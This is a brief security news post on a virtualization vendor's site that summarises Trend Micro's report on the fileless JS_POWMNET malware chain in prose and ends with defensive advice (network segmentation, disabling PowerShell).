New virus doesn't a file during infection

walden, system, systems, remote, virtual, cloud, computing, desktop, ciel, cielview, view, compute, vm, machine, vdi, infrastructure, server, paas, saas, platform, service, software, serverless, thin, client, workspace, private, public, iaas, vcloud, terminal, tco, thin client, walden systems, virtualized, customized, view
CielView-Server minimizes redundancy in computing resources while allowing users remote desktop access to virtualized user Desktops. CielView-Desktop provides customized solutions to each user in an organization

Anti-virus company Trend Micro detected new malware called JS_POWMNET that uses a fileless infection chain. A fileless infection chain never saves a file to the machine and makes it harder to analize via sandbox. It is unclear whether users unknowingly download it or other malware drops it onto the infected machine. Regardless of how it gets in, an autostart registry entry receives a url to fetch malicious JavaScript. This enables the regsrvr32 to execute arbitrary scripts without saving the xml file to the computer. The malicious script then downloads TROJ_PSINJECT which runs a Powershell script which downloads an encrypted file called "favicon." Then, finally, the favicon is decrypted so it can load up its payload. To protect against fileless malware, experts recommend segmenting their networks to limit access and to disable Powershell if they don't use it.